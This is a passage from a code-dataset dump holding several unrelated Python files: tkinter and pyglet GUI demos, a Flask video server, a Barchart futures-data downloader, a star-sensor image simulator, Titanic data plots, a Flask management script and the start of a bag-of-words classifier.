Data')\nax1.scatter(X_np, equation(a,b,c,X).detach().numpy(), color='r', label='Fitting Data')\nax1.legend(loc='best')\nplt.title(\"a={:.4f} b={:.4f} c={:.4f}\".format(a.detach().item(), b.detach().item(), c.detach().item()))\n\nax2 = fig.add_subplot(122)\nplt.plot(losses)\nplt.title('Loss')\nplt.xlabel('Epoch')\nplt.ylabel('Loss')\nplt.show()\n","sub_path":"codes/Optim_1/PyTorch_SGD.py","file_name":"PyTorch_SGD.py","file_ext":"py","file_size_in_byte":3759,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"606022189","text":"import random\nimport tkinter\nimport tkinter.messagebox\nfrom tkinter import Tk, Scrollbar, Frame, RIGHT, Y, LEFT\nfrom tkinter.ttk import Treeview\n\n# 创建tkinter应用程序窗口\nroot = Tk()\n# 设置窗口大小和位置\nroot.geometry('500x340+400+300')\n# 不允许改变窗口大小\nroot.resizable(False, False)\n# 设置窗口标题\nroot.title('Treeview——Demo')\n\n# 在窗体上创建Frame组件作为容易\nframe = Frame(root)\nframe.place(x=0, y=10, width=480, height=280)\n\n# 在Frame容器中创建滚动条\nscrollBar = Scrollbar(frame)\nscrollBar.pack(side=RIGHT, fill=Y)\n\n# 在Frame容器中使用Treeview组件实现表格功能\n# Treeview组件,6列,显示表头,带垂直滚动条\ntree = Treeview(frame,\n columns=('c1', 'c2', 'c3', 'c4', 'c5', 'c6'),\n show=\"headings\",\n yscrollcommand=scrollBar.set)\n\n# 设置每列宽度和对齐方式\ntree.column('c1', width=70, anchor='center')\ntree.column('c2', width=40, anchor='center')\ntree.column('c3', width=40, anchor='center')\ntree.column('c4', width=120, anchor='center')\ntree.column('c5', width=100, anchor='center')\ntree.column('c6', width=90, anchor='center')\n\n# 设置每列表头标题文本\ntree.heading('c1', text='姓名')\ntree.heading('c2', text='性别')\ntree.heading('c3', text='年龄')\ntree.heading('c4', text='部门')\ntree.heading('c5', text='电话')\ntree.heading('c6', text='QQ')\n\n# 左对齐,纵向填充\ntree.pack(side=LEFT, fill=Y)\n\n# Treeview组件与垂直滚动条结合\nscrollBar.config(command=tree.yview)\n\n# 定义并绑定Treeview组件的鼠标左键双击事件\ndef treeviewClick(event):\n selectedItem = tree.selection()[0]\n name = tree.item(selectedItem, 'values')[0]\n tkinter.messagebox.showinfo('报告', '你选择的是\\n'+name)\ntree.bind('', treeviewClick)\n\n# 插入随机数据的按钮\ndef onbtnInsertClick():\n values = [str(random.randrange(1000)) for _ in range(6)]\n tree.insert('', 0, values=values)\nbtnInsert = tkinter.Button(root,\n text='插入随机数据',\n command=onbtnInsertClick)\nbtnInsert.place(x=80, y=310, width=120, height=20)\n\n# 删除选中项的按钮\ndef onbtnDeleteClick():\n if not tree.selection():\n tkinter.messagebox.showerror('抱歉', '你还没有选择,不能删除')\n return\n for item in tree.selection():\n tree.delete(item)\nbtnDelete = tkinter.Button(root,\n text='删除选中项',\n command=onbtnDeleteClick)\nbtnDelete.place(x=220, y=310, width=120, height=20)\n\n# 插入演示数据\nfor i in range(20):\n tree.insert('', i, values=[str(i)]*6)\n \n# 运行程序,启动事件循环\nroot.mainloop()\n","sub_path":"python项目/GUI编程/tkinter_TreeviewGrid.pyw","file_name":"tkinter_TreeviewGrid.pyw","file_ext":"pyw","file_size_in_byte":2736,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"127546809","text":"from flask import Flask, render_template, Response\nfrom plateRecognizer import plateRecognizer\n\napp = Flask(__name__)\n\n@app.route('/')\ndef index():\n plate = plateRecognizer()\n plate.videoRecognition()\n return \"ok\"\n\ndef gen(plateRecognizer):\n while True:\n frame = plateRecognizer.get_frame()\n yield (b'--frame\\r\\n'\n b'Content-Type: image/jpeg\\r\\n\\r\\n' + frame + b'\\r\\n')\n\n@app.route('/video_feed')\ndef video_feed():\n return Response(gen(plateRecognizer()),\n mimetype='multipart/x-mixed-replace; boundary=frame')\n\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', debug=True)","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":641,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"172788218","text":"'''\n************************ Overview ************************\nThis workbook automates the download of futures daily pricing \n zip files from Barchart ACS.\n\n1. It will use Selenium to login to the Barchart ACS site; \n2. It will scrape the urls of the zip files, and then download those zipfiles into a folder which is specified using:\n folder (specified by the command line argumet zip_folder_parent)\n \n************************ Usage ************************\npython3 step_01_download_monthly_acs_files_only_futures.py --acs_username myusername \\\n--acs_password mypassword --zip_folder_parent myhome/barchart_files --begin_yy 11 --end_yy 19\n\n\n'''\n\n'''\n************************** Step 1: Imports **************************\n'''\nimport argparse as ap\nimport sel_scrape as sc #@UnresolvedImport\n# from selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\n# from selenium.webdriver.common.alert import Alert\nfrom selenium.webdriver.support.ui import WebDriverWait as wait\nfrom selenium.webdriver.support import expected_conditions as EC\nimport requests\nfrom requests.auth import HTTPBasicAuth\nimport os\nimport time\nimport traceback\nfrom tqdm import tqdm\nimport numpy as np\nimport logging\nimport re\n\n\ndef init_root_logger(logfile,logging_level=None):\n level = logging_level\n if level is None:\n level = logging.DEBUG\n # get root level logger\n logger = logging.getLogger()\n if len(logger.handlers)>0:\n return logger\n logger.setLevel(logging.getLevelName(level))\n\n fh = logging.FileHandler(logfile)\n fh.setLevel(logging.DEBUG)\n # create console handler with a higher log level\n ch = logging.StreamHandler()\n ch.setLevel(logging.DEBUG)\n # create formatter and add it to the handlers\n formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n fh.setFormatter(formatter)\n ch.setFormatter(formatter)\n # add the handlers to the logger\n logger.addHandler(fh)\n logger.addHandler(ch) \n return logger\n\nif __name__ == '__main__':\n parser = ap.ArgumentParser()\n parser.add_argument('--acs_username',type=str,\n help='username of Barchart ACS service')\n parser.add_argument('--acs_password',type=str,\n help='password of Barchart ACS service')\n parser.add_argument('--zip_folder_parent',type=str,\n help='full folder path into which you will download zip files')\n parser.add_argument('--begin_yy',type=int,\n help='2 character year like 11 for 2011 or 23 for 2023 for first year of options zip files to download from barchart')\n parser.add_argument('--end_yy',type=int,\n help='2 character year like 11 for 2011 or 23 for 2023 for last year of options zip files to download from barchart')\n parser.add_argument('--month_list',type=str,\n help='comma separated list (NO SPACES) of 3 character months like jan,feb,mar. Omit to do all months for each year.',\n default=\"\")\n parser.add_argument('--log_file_path',type=str,\n help='path to log file. Default = logfile.log',\n default = 'logfile.log')\n parser.add_argument('--show_browser',type=bool,\n help='if --show_browser is on the command line, then the browser will be shown during scraping')\n parser.add_argument('--logging_level',type=str,\n help='log level. Default = INFO',\n default = 'INFO')\n \n args = parser.parse_args()\n\n '''\n ********************************** Step 2: Set import variables ******************\n \n Determine years to download, and the download location\n \n Set the variables \n ZIP_FOLDER_PARENT\n BEGIN_YY\n END_YY\n \n These values determine \n 1. The location to which zip files get downloaded;\n 2. The first year and last year of daily options settlements to scrape from the Barchart ACS website.\n \n '''\n \n ZIP_FOLDER_PARENT = args.zip_folder_parent\n BEGIN_YY = args.begin_yy\n END_YY = args.end_yy\n ACS_USERNAME = args.acs_username\n ACS_PASSWORD = args.acs_password\n month_list = args.month_list\n \n log_file_path = args.log_file_path\n logging_level = args.logging_level\n logger = init_root_logger(log_file_path, logging_level)\n \n logger.info(f'ZIP_FOLDER_PARENT into which files will be download = {ZIP_FOLDER_PARENT}')\n headless = False if args.show_browser else True\n \n \n '''\n **************************** Step 3: Set important constants *****************************\n The constants below should be left as is - DO NOT CHANGE.\n '''\n MMM_LIST = ['jan','feb','mar','apr','may','jun','jul','aug','sep','oct','nov','dec']\n if month_list is not None and len(month_list)>0:\n MMM_LIST = month_list.replace(\" \",\"\").split(\",\")\n logger.info(f\"using month list {MMM_LIST}\")\n YY_LIST = list(np.arange(BEGIN_YY,END_YY+1))\n MMMYY_LIST = [mmm + str(yy) for mmm in MMM_LIST for yy in YY_LIST]\n ACS_HOME_PAGE = 'http://acs.barchart.com/mri/mripag.htm' \n ACS_FUTURES_PAGE = 'http://acs.barchart.com/mri/mrgfutz.htm'\n# ACS_OPTIONS_PAGE = 'http://acs.barchart.com/mri/mriopt.htm'\n \n '''\n **************************** Step 4: Set ZIP_FOLDER_PARENT ******************************\n Determine ZIP_FOLDER_PARENT, which represents the folder into which Barchart ACS zip files get downloaded.\n '''\n if not os.path.exists(ZIP_FOLDER_PARENT):\n logger.info(f'making parent folder {ZIP_FOLDER_PARENT}')\n os.makedirs(ZIP_FOLDER_PARENT)\n else:\n logger.info(f'parent folder {ZIP_FOLDER_PARENT} already exists')\n \n# \n# '''\n# ************************ Step 5: Instantiate SelScape ***************\n# Instantiate an instance of sel_scape.SelScrape in order to \n# scrape the Barchart ACS website. \n# '''\n# \n# sela = sc.SelScrape(headless=headless)\n# sela.goto(ACS_HOME_PAGE)\n# time.sleep(1)\n# wait(sela.driver, 5).until(EC.alert_is_present())\n# alert = sela.driver.switch_to_alert()\n# alert.send_keys(f'{ACS_USERNAME}{Keys.TAB}{ACS_PASSWORD}')\n# time.sleep(3)\n# alert.accept()\n# \n# '''\n# ************************ Step 6: Navigate to Home Page ****************\n# '''\n# sela.goto(ACS_OPTIONS_PAGE)\n# \n# \n# '''\n# ************************ Step 7: Obtain URLS ****************\n# Scrape the urls for options zip files to be downloaded.\n# '''\n# monthly_csv_files_xpath = \"//a[contains(@href,'data/opt/opv')]\"\n# mcsv_elements = sela.findxpath(monthly_csv_files_xpath)['value']\n# mcsv_hrefs_all = []\n# for mcsv in mcsv_elements:\n# mcsv_hrefs_all.append(mcsv.get_attribute('href'))\n# mcsv_hrefs_all\n# \n# def is_valid_yyymm(h):\n# return any([m in h for m in MMMYY_LIST])\n# mcsv_hrefs = [h for h in mcsv_hrefs_all if is_valid_yyymm(h) ] \n# mcsv_hrefs\n# \n# \n# '''\n# ************************ Step 8: Execute Download ****************\n# Download the zip files into their appropriate folders.\n# '''\n# \n# options_parent = ZIP_FOLDER_PARENT+'/options'\n# if not os.path.isdir(options_parent):\n# logger.info(f'making options folder {options_parent}')\n# os.mkdir(options_parent)\n# else:\n# logger.info(f'options folder {options_parent} already exists')\n# hrefs_to_unzip = []\n# paths_to_unzip_to = []\n# for mcsv_href in mcsv_hrefs:\n# zip_file_name = mcsv_href.split('/')[-1]\n# folder_name = zip_file_name.replace('.zip','')\n# path_to_zip_folder = f'{options_parent}/{folder_name}'\n# if not os.path.isdir(path_to_zip_folder):\n# logger.info(f'making {path_to_zip_folder}')\n# os.mkdir(path_to_zip_folder)\n# path_to_zip_file = f'{path_to_zip_folder}/{zip_file_name}'\n# if not os.path.isfile(path_to_zip_file):\n# hrefs_to_unzip.append(mcsv_href)\n# paths_to_unzip_to.append(path_to_zip_file)\n# \n# successful_downloads = []\n# for i in tqdm(range(len(hrefs_to_unzip))):\n# url = hrefs_to_unzip[i]\n# path_to_zip_file = paths_to_unzip_to[i]\n# try: \n# r=requests.get(url, auth=HTTPBasicAuth(ACS_USERNAME, ACS_PASSWORD))\n# p = paths_to_unzip_to[i]\n# with open(p, 'wb') as f:\n# f.write(r.content)\n# successful_downloads.append(path_to_zip_file)\n# except Exception as e:\n# traceback.print_exc()\n# \n# sela.driver.quit() \n \n def is_valid_yyymm(h):\n return any([m in h for m in MMMYY_LIST])\n\n '''\n ************************ Step 9: Setup Folders for Futures Download ****************\n '''\n futures_parent = ZIP_FOLDER_PARENT+'/futures'\n if not os.path.isdir(futures_parent):\n logger.info(f'making futures folder {futures_parent}')\n os.mkdir(futures_parent)\n else:\n logger.info(f'futures folder {futures_parent} already exists')\n\n\n '''\n ************************ Step 10: Instantiate a new SelScrape ****************\n '''\n sela = sc.SelScrape(headless=headless)\n sela.goto(ACS_HOME_PAGE)\n time.sleep(1)\n wait(sela.driver, 5).until(EC.alert_is_present())\n alert = sela.driver.switch_to_alert()\n alert.send_keys(f'{ACS_USERNAME}{Keys.TAB}{ACS_PASSWORD}')\n time.sleep(3)\n alert.accept()\n\n '''\n ************************ Step 11: Execute the Download of Monthly Futures zip files ****************\n '''\n sela.goto(ACS_FUTURES_PAGE)\n monthly_csv_files_xpath = \"//td/a[contains(@href,'data/mrg/mrg')]\"\n mcsv_elements = sela.findxpath(monthly_csv_files_xpath)['value']\n mcsv_hrefs_all = []\n for mcsv in mcsv_elements:\n mcsv_hrefs_all.append(mcsv.get_attribute('href'))\n all_years = np.arange(BEGIN_YY,END_YY+1)\n mcsv_hrefs = [h for h in mcsv_hrefs_all if (int(re.findall('[0-9]{1,2}',h)[0]) in all_years) and (is_valid_yyymm(h))] \n \n hrefs_to_unzip = []\n paths_to_unzip_to = []\n for mcsv_href in mcsv_hrefs:\n zip_file_name = mcsv_href.split('/')[-1]\n path_to_zip_file = f'{futures_parent}/{zip_file_name}'\n if not os.path.isfile(path_to_zip_file):\n hrefs_to_unzip.append(mcsv_href)\n paths_to_unzip_to.append(path_to_zip_file)\n \n successful_downloads = []\n for i in tqdm(range(len(hrefs_to_unzip))):\n try: \n url = hrefs_to_unzip[i]\n r=requests.get(url, auth=HTTPBasicAuth(ACS_USERNAME, ACS_PASSWORD))\n p = paths_to_unzip_to[i]\n with open(p, 'wb') as f:\n f.write(r.content)\n successful_downloads.append(path_to_zip_file)\n except Exception as e:\n traceback.print_exc()\n \n \n sela.driver.quit() \n \n '''\n ************************ END ****************\n '''\n \n \n","sub_path":"barchartacs/step_01_download_monthly_acs_files_only_futures.py","file_name":"step_01_download_monthly_acs_files_only_futures.py","file_ext":"py","file_size_in_byte":11055,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"462446252","text":"HTML_ORIGINAL = 'base-index.html'\n\nCSS_INJECTION_TAG = ''\nHTML_INJECTION_TAG = ''\nCSS_STR = (5*' ' + '')\nHTML_STR = \"{html}\"\n\nwith open(HTML_ORIGINAL, 'r') as original:\n pre_model = original.read()\n\npre_model = pre_model.replace(CSS_INJECTION_TAG, CSS_STR)\nmodel = pre_model.replace(HTML_INJECTION_TAG, HTML_STR)\n","sub_path":"page_model.py","file_name":"page_model.py","file_ext":"py","file_size_in_byte":446,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"279342454","text":"from math import radians,degrees,sin,cos,tan,sqrt,atan,pi,exp\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport cv2\n\ndef displayImg(img,cmap='gray'):\n \"\"\"[Displays image]\n\n Args:\n img ([numpy array]): [the pixel values in the form of numpy array]\n cmap ([string], optional): [can be 'gray']. Defaults to None.\n \"\"\"\n fig = plt.figure(figsize=(12,10))\n ax = fig.add_subplot(111)\n ax.imshow(img,cmap)\n plt.show()\n\ndef create_star_image(ra,de,roll,f=0.00304,myu=1.12*(10**-6)):\n \"\"\"[summary]\n\n Args:\n ra ([float]): [right ascension in degrees]\n de ([float]): [declination in degrees]\n roll ([float]): [roll in degrees]\n \"\"\"\n\n\n def create_M_matrix(ra,de,roll,method=2):\n \"\"\"[summary]\n\n Args:\n ra ([int]): [right ascension of sensor center]\n de ([int]): [declination of sensor center]\n roll ([int]): [roll angle of star sensor]\n method ([int]): [1 for method 1(Calculating each elements),2 for method 2(calculating rotation matrices)]\n \"\"\"\n if method == 1:\n a1 = (sin(ra)*cos(roll)) - (cos(ra)*sin(de)*sin(roll))\n a2 = -(sin(ra)*sin(roll)) - (cos(ra)*sin(de)*cos(roll))\n a3 = -(cos(ra)*cos(de))\n b1 = -(cos(ra)*cos(roll)) - (sin(ra)*sin(de)*sin(roll))\n b2 = (cos(ra)*sin(roll)) - (sin(ra)*sin(de)*cos(roll))\n b3 = -(sin(ra)*cos(de))\n c1 = (cos(ra)*sin(roll))\n c2 = (cos(ra)*cos(roll))\n c3 = -(sin(de))\n M = np.array([[a1,a2,a3],[b1,b2,b3],[c1,c2,c3]])\n if method == 2:\n ra_exp = ra - (pi/2)\n de_exp = de + (pi/2)\n M1 = np.array([[cos(ra_exp),-sin(ra_exp),0],[sin(ra_exp),cos(ra_exp),0],[0,0,1]])\n M2 = np.array([[1,0,0],[0,cos(de_exp),-sin(de_exp)],[0,sin(de_exp),cos(de_exp)]])\n M3 = np.array([[cos(roll),-sin(roll),0],[sin(roll),cos(roll),0],[0,0,1]])\n first_second = np.matmul(M1,M2)\n M = np.matmul(first_second,M3)\n return M\n\n\n def dir_vector_to_star_sensor(ra,de,M_transpose):\n \"\"\"[Converts direction vector to star sensor coordinates]\n\n Args:\n ra ([int]): [right ascension of the object vector]\n de ([int]): [desclination of the object vector]\n M_transpose ([numpy array]): [rotation matrix from direction vector to star sensor transposed]\n \"\"\" \n x_dir_vector = (cos(ra)*cos(de))\n y_dir_vector = (sin(ra)*cos(de))\n z_dir_vector = (sin(de))\n dir_vector_matrix = np.array([[x_dir_vector],[y_dir_vector],[z_dir_vector]])\n return M_transpose.dot(dir_vector_matrix)\n\n\n def draw_star(x,y,magnitude,gaussian,background,ROI=5):\n \"\"\"[Draws the star in the background image]\n\n Args:\n x ([int]): [The x coordinate in the image coordinate system (starting from left to right)]\n y ([int]): [The y coordinate in the image coordinate system (starting from top to bottom)]\n magnitude ([float]): [The stellar magnitude]\n gaussian ([bool]): [True if using the gaussian function, false if using own function]\n background ([numpy array]): [background image]\n ROI ([int]): [The ROI of each star in pixel radius]\n \"\"\"\n if gaussian:\n H = 2000*exp(-magnitude+1)\n sigma = 5\n for u in range(x-ROI,x+ROI+1):\n for v in range(y-ROI,y+ROI+1):\n dist = ((u-x)**2)+((v-y)**2)\n diff = (dist)/(2*(sigma**2))\n exponent_exp = 1/(exp(diff))\n raw_intensity = int(round((H/(2*pi*(sigma**2)))*exponent_exp))\n background[v,u] = raw_intensity\n else:\n mag = abs(magnitude-7) #1 until 9\n radius = int(round((mag/9)*(5)+3))\n color = int(round((mag/9)*(155)+100))\n cv2.circle(background,(x,y),radius,color,thickness=-1)\n return background\n\n def add_noise(low,high,background):\n \"\"\"[Adds noise to an image]\n\n Args:\n low ([int]): [lower threshold of the noise generated]\n high ([int]): [maximum pixel value of the noise generated]\n background ([numpy array]): [the image that is put noise on]\n \"\"\"\n row,col = np.shape(background)\n background = background.astype(int)\n noise = np.random.randint(low,high=high,size=(row,col))\n noised_img = cv2.addWeighted(noise,0.1,background,0.9,0)\n return noised_img\n\n\n #Right ascension, declination and roll\n ra = radians(float(ra))\n de = radians(float(de))\n roll = radians(float(roll))\n\n #Star sensor pixel\n l = 3280\n w = 2464\n\n #Star sensor FOV\n FOVy = degrees(2*atan((myu*w/2)/f))\n FOVx = degrees(2*atan((myu*l/2)/f))\n\n #STEP 1: CONVERSION OF CELESTIAL COORDINATE SYSTEM TO STAR SENSOR COORDINATE SYSTEM\n M = create_M_matrix(ra,de,roll)\n M_transpose = np.round(np.matrix.transpose(M),decimals=5)\n\n #Search for image-able stars\n col_list = [\"Star ID\",\"RA\",\"DE\",\"Magnitude\"]\n star_catalogue = pd.read_csv('filtered_catalogue/Below_6.0_SAO.csv',usecols=col_list)\n R = (sqrt((radians(FOVx)**2)+(radians(FOVy)**2))/2)\n alpha_start = (ra - (R/cos(de)))\n alpha_end = (ra + (R/cos(de)))\n delta_start = (de - R)\n delta_end = (de + R)\n star_within_ra_range = (alpha_start <= star_catalogue['RA']) & (star_catalogue['RA'] <= alpha_end)\n star_within_de_range = (delta_start <= star_catalogue['DE']) & (star_catalogue['DE'] <= delta_end)\n star_in_ra = star_catalogue[star_within_ra_range]\n star_in_de = star_catalogue[star_within_de_range]\n star_in_de = star_in_de[['Star ID']].copy()\n stars_within_FOV = pd.merge(star_in_ra,star_in_de,on=\"Star ID\")\n\n #Converting to star sensor coordinate system\n ra_i = list(stars_within_FOV['RA'])\n de_i = list(stars_within_FOV['DE'])\n star_sensor_coordinates = []\n for i in range(len(ra_i)):\n coordinates = dir_vector_to_star_sensor(ra_i[i],de_i[i],M_transpose=M_transpose)\n star_sensor_coordinates.append(coordinates)\n\n #STEP 2: CONVERSION OF STAR SENSOR COORDINATE SYSTEM TO IMAGE COORDINATE SYSTEM\n star_loc = []\n for coord in star_sensor_coordinates:\n x = f*(coord[0]/coord[2])\n y = f*(coord[1]/coord[2])\n star_loc.append((x,y))\n\n xtot = 2*tan(radians(FOVx)/2)*f\n ytot = 2*tan(radians(FOVy)/2)*f\n xpixel = l/xtot\n ypixel = w/ytot\n\n magnitude_mv = list(stars_within_FOV['Magnitude'])\n filtered_magnitude = []\n\n #Rescaling to pixel sizes\n pixel_coordinates = []\n delete_indices = []\n for i,(x1,y1) in enumerate(star_loc):\n x1 = float(x1)\n y1 = float(y1)\n x1pixel = round(xpixel*x1)\n y1pixel = round(ypixel*y1)\n if abs(x1pixel) > l/2 or abs(y1pixel) > w/2:\n delete_indices.append(i)\n continue\n pixel_coordinates.append((x1pixel,y1pixel))\n filtered_magnitude.append(magnitude_mv[i])\n\n background = np.zeros((w,l))\n\n for i in range(len(filtered_magnitude)):\n x = round(l/2 + pixel_coordinates[i][0])\n y = round(w/2 - pixel_coordinates[i][1])\n background = draw_star(x,y,filtered_magnitude[i],False,background)\n\n #Adding noise\n background = add_noise(0,50,background=background)\n\n return background","sub_path":"nested_function.py","file_name":"nested_function.py","file_ext":"py","file_size_in_byte":7440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"255960052","text":"from pyglet.gl import *\r\n\r\nclass Pixels:\r\n def __init__(self, batch, position, color=None, group=None):\r\n self.group = group\r\n self.position = position\r\n self.length = int(len(position)/2)\r\n if not color:\r\n color = [255]*3*self.length\r\n self.color = color\r\n self.batch = batch\r\n self.vertex = None\r\n try:\r\n if position: self.draw()\r\n else: raise AttributeError\r\n except AttributeError:\r\n exit(f\"\"\"Program ends with AttributeError for object={self}:\r\n Pixels(batch={batch}, position={position}, color={color})\r\n Possible calls:\r\n Pixels(batch, position)\r\n color - optional, otherwise white-white\"\"\")\r\n \r\n def draw(self):\r\n self.vertex = self.batch.add(self.length, GL_POINTS, self.group,\r\n ('v2f', self.position), \r\n ('c3B', self.color))\r\n \r\n def update(self, points=None, position=None, color=None, add=False):\r\n if points and not position:\r\n if color: self.color = color\r\n elif position:\r\n if add:\r\n self.length += int(len(position)/2)\r\n self.position += position\r\n if color: self.color += color\r\n else: self.color += [255]*3*int(len(position)/2)\r\n else:\r\n self.length = int(len(position)/2)\r\n self.position = position\r\n if color: self.color = color\r\n if self.vertex:\r\n self.vertex.delete()\r\n self.vertex = None\r\n self.draw()\r\n \r\n def remove(self):\r\n self.vertex.delete()\r\n del self\r\n \r\n def hide(self):\r\n self.vertex.delete()","sub_path":"pixel_object.py","file_name":"pixel_object.py","file_ext":"py","file_size_in_byte":1767,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"347537813","text":"import pandas as pd\nimport numpy as np\nimport sklearn\nimport matplotlib.pyplot as plt\nfrom pylab import *\n\n\nif __name__ == '__main__':\n\n data_train = pd.read_csv('./data/train.csv')\n\n\n\n # #pic\n # mpl.rcParams['font.sans-serif'] = ['SimHei']\n # plt.rcParams['font.sans-serif'] = ['SimHei']\n # plt.rcParams['axes.unicode_minus']=True\n # fig = plt.figure()\n # fig.set(alpha = 1)\n\n # #data\n # plt.subplot2grid((2,3),(0,0))\n # data_train.Survived.value_counts().plot(kind=\"bar\")\n # plt.title(u\"survived\")\n\n # plt.subplot2grid((2,3),(0,1))\n # data_train.Pclass.value_counts().plot(kind=\"bar\")\n # plt.title(u'Pclass')\n\n # plt.subplot2grid((2,3),(0,2))\n # plt.scatter(data_train.Survived, data_train.Age)\n # plt.grid(b=True,which=\"major\",axis=\"y\")\n # plt.title(u'age by survived')\n\n # plt.subplot2grid((2,3),(1,0),colspan=2)\n # data_train.Age[data_train.Pclass == 1].plot(kind=\"kde\")\n # data_train.Age[data_train.Pclass == 2].plot(kind=\"kde\")\n # data_train.Age[data_train.Pclass == 3].plot(kind=\"kde\")\n # plt.xlabel(u'age')\n # plt.title('pclass by age')\n # plt.legend((u'1','2','3'),loc=\"best\")\n\n # plt.subplot2grid((2,3),(1,2))\n # data_train.Embarked.value_counts().plot(kind=\"bar\")\n # plt.title('people of embarked')\n\n # plt.show()\n\n fig = plt.figure()\n fig.set(alpha = 0.2)\n\n # #Pclass对获救的影响\n # Survived_0 = data_train.Pclass[data_train.Survived == 0].value_counts()\n # Survived_1 = data_train.Pclass[data_train.Survived == 1].value_counts()\n # df = pd.DataFrame({'survived': Survived_1,'not survived': Survived_0})\n # df.plot(kind=\"bar\")\n\n # #性别对获救的影响\n # Survived_m = data_train.Survived[data_train.Sex == 'male'].value_counts()\n # Survived_f = data_train.Survived[data_train.Sex == 'female'].value_counts()\n # df = pd.DataFrame({'survived_male': Survived_m, 'survived_female': Survived_f})\n # df.plot(kind=\"bar\")\n\n #各种舱位对应性别的生还\n ax1 = fig.add_subplot(161)\n data_train.Survived[data_train.Sex == 'female'][data_train.Pclass == 1].value_counts().plot(kind=\"bar\",label=\"female 1 class\", color=\"#FA2479\")\n ax1.set_xticklabels([u's',u'not s'],rotation= 0)\n ax1.legend([u'female/1'],loc=\"best\")\n\n ax2 = fig.add_subplot(162,sharey=ax1)\n data_train.Survived[data_train.Sex == 'female'][data_train.Pclass == 2].value_counts().plot(kind=\"bar\",label=\"female 2 class\", color=\"pink\")\n ax2.set_xticklabels([u's',u'not s'],rotation = 0)\n ax2.legend([u'female/2'],loc=\"best\")\n\n ax3 = fig.add_subplot(163,sharey=ax1)\n data_train.Survived[data_train.Sex == 'female'][data_train.Pclass == 3].value_counts().plot(kind=\"bar\",label=\"female 3 class\", color=\"pink\")\n print ( data_train.Survived[data_train.Sex == 'female'][data_train.Pclass == 3].value_counts())\n ax3.legend([u'female/3'],loc=\"best\")\n\n ax4 = fig.add_subplot(164,sharey=ax1)\n data_train.Survived[data_train.Sex == 'male'][data_train.Pclass == 1].value_counts().plot(kind=\"bar\",label=\"male 1 class\", color=\"red\")\n ax4.set_xticklabels([u'not s',u'not s'],rotation = 0)\n ax4.legend(['male/1'],loc=\"best\")\n\n\n ax5 = fig.add_subplot(165,sharey=ax1)\n data_train.Survived[data_train.Sex == 'male'][data_train.Pclass == 2].value_counts().plot(kind=\"bar\",label=\"male 2 class\", color=\"red\")\n ax5.set_xticklabels([u'not s',u' s'],rotation = 0)\n ax5.legend(['male/2'],loc=\"best\")\n\n\n ax6 = fig.add_subplot(166,sharey=ax1)\n data_train.Survived[data_train.Sex == 'male'][data_train.Pclass == 3].value_counts().plot(kind=\"bar\",label=\"male 3 class\", color=\"red\")\n ax6.set_xticklabels([u'not s',u' s'],rotation = 0)\n ax6.legend(['male/3'],loc=\"best\")\n plt.show()\n\n","sub_path":"Titanic/data_view.py","file_name":"data_view.py","file_ext":"py","file_size_in_byte":3738,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"532301140","text":"import os\r\nimport sys\r\nimport unittest\r\nimport datetime\r\nimport uuid\r\n\r\nfrom flask_migrate import Migrate, MigrateCommand\r\nfrom flask_script import Manager, Command\r\n\r\nfrom app.main import create_app, db\r\nfrom app.main.model.user import User\r\nfrom app.main.model.place import Place\r\nfrom app.main.model.review import Review\r\nfrom app import blueprint\r\n\r\nclass FlagManager(Manager):\r\n def command(self, capture_all=False):\r\n def decorator(func):\r\n command = Command(func)\r\n command.capture_all_args = capture_all\r\n self.add_command(func.__name__, command)\r\n\r\n return func\r\n return decorator\r\n\r\napp = create_app(os.getenv('BOILERPLATE_ENV') or 'dev')\r\napp.register_blueprint(blueprint)\r\napp.app_context().push()\r\nmanager = FlagManager(app)\r\nmigrate = Migrate(app, db)\r\nmanager.add_command('db', MigrateCommand)\r\n\r\n@manager.command()\r\ndef run():\r\n app.run(host='165.22.146.92', port=80)\r\n\r\n@manager.command()\r\ndef test():\r\n \"\"\"Runs the unit tests.\"\"\"\r\n tests = unittest.TestLoader().discover('app/test', pattern='test*.py')\r\n result = unittest.TextTestRunner(verbosity=2).run(tests)\r\n if result.wasSuccessful():\r\n return 0\r\n return 1\r\n\r\n@manager.command(True)\r\ndef create_admin(*args):\r\n\r\n if len(args[0]) < 2:\r\n print(\"Usage: python manage.py create_admin [user] [password] \")\r\n\r\n admin = User(\r\n public_id=str(uuid.uuid4()),\r\n email=\"admin\",\r\n username=sys.argv[2],\r\n password=sys.argv[3],\r\n admin= True,\r\n registered_on=datetime.datetime.utcnow()\r\n )\r\n\r\n\r\n \r\n db.session.add(admin) \r\n db.session.commit()\r\n\r\n@manager.command(True)\r\ndef create_mongodb_collections(*args):\r\n mongo.db.createCollection('places')\r\n\r\nif __name__ == '__main__':\r\n # Command.capture_all_args = True\r\n manager.run()\r\n\r\n","sub_path":"manage.py","file_name":"manage.py","file_ext":"py","file_size_in_byte":1886,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"83775393","text":"import os\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.ensemble import RandomForestClassifier\nimport pandas as pd\nimport numpy as np\nfrom nltk.corpus import stopwords\nimport get_data\nimport re\nfrom tqdm import tqdm\n\nclass Bag_of_words():\n\n def __init__(self, data):\n self.data_reviews = data\n\n def gen_bag_for_all(self):\n clean_train_reviews = []\n for r in tqdm(self.data_reviews):\n clean_train_reviews.append(\" \".join(self.review_to_wordlist(r[\"reviewText\"], True)))\n return clean_train_reviews\n\n\n def train_bag(self, clean_train_reviews):\n self.vectorizer = 